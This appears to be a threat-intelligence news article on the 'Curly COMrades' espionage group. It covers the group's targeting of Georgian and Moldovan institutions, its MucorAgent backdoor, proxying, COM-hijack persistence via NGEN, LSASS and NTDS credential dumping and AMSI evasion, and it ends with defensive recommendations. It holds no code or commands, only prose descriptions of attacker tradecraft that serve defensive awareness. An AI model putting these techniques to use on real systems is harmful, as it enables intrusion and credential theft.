A sophisticated new cyber-espionage threat group has emerged on the global cybersecurity landscape, utilizing advanced custom malware to infiltrate government organizations and critical infrastructure entities. Security researchers have identified this previously unknown actor as “Curly COMrades,” a designation that reflects the group’s distinctive operational characteristics and technical methodology.
Emergence and Target Profile
The threat group has been actively conducting espionage operations since mid-2024, focusing primarily on government and judicial institutions in Georgia, as well as energy sector organizations in Moldova. Intelligence analysis suggests that the group’s activities align with Russian Federation geopolitical objectives, though researchers have not established definitive links to known Russian Advanced Persistent Threat (APT) groups.
The targeting pattern indicates a strategic focus on former Soviet states and their critical infrastructure, consistent with broader regional cyber-espionage campaigns observed in recent years. The selection of government judicial bodies and energy companies suggests intelligence gathering objectives related to political decision-making processes and critical infrastructure vulnerabilities.
Technical Arsenal and Attack Methodology
MucorAgent: A Sophisticated Backdoor System
The centerpiece of Curly COMrades’ operations is a custom three-stage malware framework called MucorAgent. This complex .NET-based tool functions as a stealthy backdoor capable of executing AES-encrypted PowerShell scripts while maintaining persistent access to compromised systems.
The malware architecture demonstrates advanced engineering principles, incorporating multiple layers of obfuscation and evasion techniques. MucorAgent’s design allows it to blend seamlessly with legitimate system processes while providing attackers with comprehensive remote access capabilities.
Multi-Stage Deployment Process
The attack chain begins with the deployment of multiple proxy agents across internal networks, including the Go-based Resocks tool. These proxy components are retrieved using curl.exe and establish persistence through scheduled tasks or Windows services, communicating with command-and-control infrastructure via TCP ports 443 or 8443.
For operational redundancy, the attackers deploy custom SOCKS5 servers and utilize SSH combined with Stunnel for remote port forwarding. Some SSH connections are routed through a proprietary tool called CurlCat, which employs the libcurl library and a custom Base64 alphabet to obfuscate network traffic by relaying communications through compromised legitimate websites.
Innovative Persistence Mechanisms
One of the most notable aspects of Curly COMrades’ operations is their unconventional persistence strategy. The group achieves system persistence by hijacking Component Object Model (COM) Class Identifiers (CLSIDs) to target the Native Image Generator (NGEN), a standard Windows .NET Framework component.
This persistence method exploits NGEN’s pre-compilation functionality through a seemingly disabled scheduled task that the operating system randomly enables and executes during idle periods or application deployments. While this approach provides stealth, its unpredictable execution pattern suggests the attackers likely maintain secondary, more reliable activation mechanisms.
Data Collection and Network Infiltration
Credential Harvesting Operations
Curly COMrades demonstrates sophisticated understanding of Windows network architecture, repeatedly attempting to extract NTDS databases from domain controllers and dump LSASS memory from targeted systems to recover active user credentials. These activities indicate a focus on lateral movement and persistent network access rather than simple data theft.
The group extensively utilizes “living-off-the-land” techniques, executing legitimate Windows commands such as netstat, tasklist, systeminfo, wmic, and ipconfig to gather system intelligence. They also employ PowerShell Active Directory enumeration cmdlets and automated batch scripts to streamline their reconnaissance activities.
Advanced Evasion Techniques
The MucorAgent backdoor incorporates anti-analysis features, including components designed to bypass Windows Antimalware Scan Interface (AMSI) protections. The malware searches for encrypted data blobs disguised as PNG image files (index.png and icon.png) downloaded from compromised websites, demonstrating sophisticated supply chain compromise techniques.
To maintain interactive control over compromised systems, the attackers install legitimate remote monitoring software, including Remote Utilities and various Remote Monitoring and Management (RMM) tools commonly used by IT professionals. This approach allows malicious activity to blend with normal administrative operations.
Operational Security and Detection Challenges
Despite employing advanced evasion techniques and leveraging legitimate tools that generate minimal suspicious network traffic, Curly COMrades’ operations produce sufficient behavioral anomalies to trigger modern Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) security sensors.
The group’s extensive efforts to maintain persistent access indicate a long-term espionage mission rather than opportunistic cybercrime. Their willingness to deploy multiple redundant access methods and custom-developed tools suggests significant resources and advanced technical capabilities.
Strategic Implications
The emergence of Curly COMrades represents a concerning evolution in state-sponsored cyber-espionage capabilities. Their sophisticated custom malware development, innovative persistence techniques, and strategic targeting of government institutions and critical infrastructure demonstrate the increasing sophistication of nation-state threat actors.
The group’s focus on former Soviet states aligns with broader geopolitical tensions and suggests potential intelligence gathering operations supporting Russian foreign policy objectives. Organizations in the targeted regions should implement enhanced monitoring for the specific techniques and indicators associated with this threat group.
Defensive Considerations
The Curly COMrades campaign highlights the importance of comprehensive endpoint monitoring and behavioral analysis in modern cybersecurity defense strategies. Traditional signature-based detection methods prove insufficient against custom malware employing advanced evasion techniques and legitimate tool abuse.
Organizations should focus on monitoring for unusual scheduled task modifications, unexpected COM object registrations, and abnormal network proxy configurations. The group’s reliance on legitimate remote administration tools also necessitates careful scrutiny of authorized remote access software installations and usage patterns.
The sophisticated nature of this threat emphasizes the critical importance of maintaining current security patches, implementing robust access controls, and deploying advanced threat detection capabilities capable of identifying subtle behavioral anomalies indicative of advanced persistent threat activity.
